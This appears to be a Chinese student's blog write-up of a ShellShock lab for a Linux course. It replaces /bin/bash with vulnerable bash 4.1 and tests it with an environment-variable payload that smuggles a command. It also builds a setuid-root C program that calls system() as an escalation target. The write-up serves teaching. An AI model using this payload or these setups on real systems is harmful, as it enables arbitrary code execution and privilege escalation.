PPswaggy  

Linux 基础

实验 <ShellShock攻击实验>

作业所属课程 <2020-2021-1Linux内核原理与分析>
作业要求 <2020-2021-1Linux内核原理与分析第一周作业>
作业目标 <ShellShock攻击实验>
作业正文 2020-2021-1 20209308《Linux内核原理与分析》第12周作业

1.实验简介

Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。

2.实验过程

2.1环境搭建

下载

sudo su
wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

安装

$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure 
$ make && make install


链接

$ rm /bin/bash
$ ln -s /usr/local/bin/bash /bin/bash

接下来检测是否存在shellshock漏洞

$ exit
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"

2.2攻击Set—UID程序

在 /home/shiyanlou 目录下新建一个 shock.c 文件:

#include <stdio.h>
void main()
{
    setuid(geteuid()); // make real uid = effective uid.
    system("/bin/ls -l");
}

编译这段代码,并设置其为Set-UID程序,保证它的所有者是root。

$ sudo su
$ gcc -o shock shock.c
$ chmod u+s shock


再去掉setuid(geteuid()) 语句,修改shock.c,查看是否可以拿到权限

失败说明 real uid 和 effective uid 相同时,定义在环境变量中的内容在该程序内有效,shellshock漏洞能够被利用。当两个 uid 不同时,环境变量失效,无法进行攻击。

posted on 2020-12-27 11:09  PPswaggy  阅读(60)  评论(0编辑  收藏  举报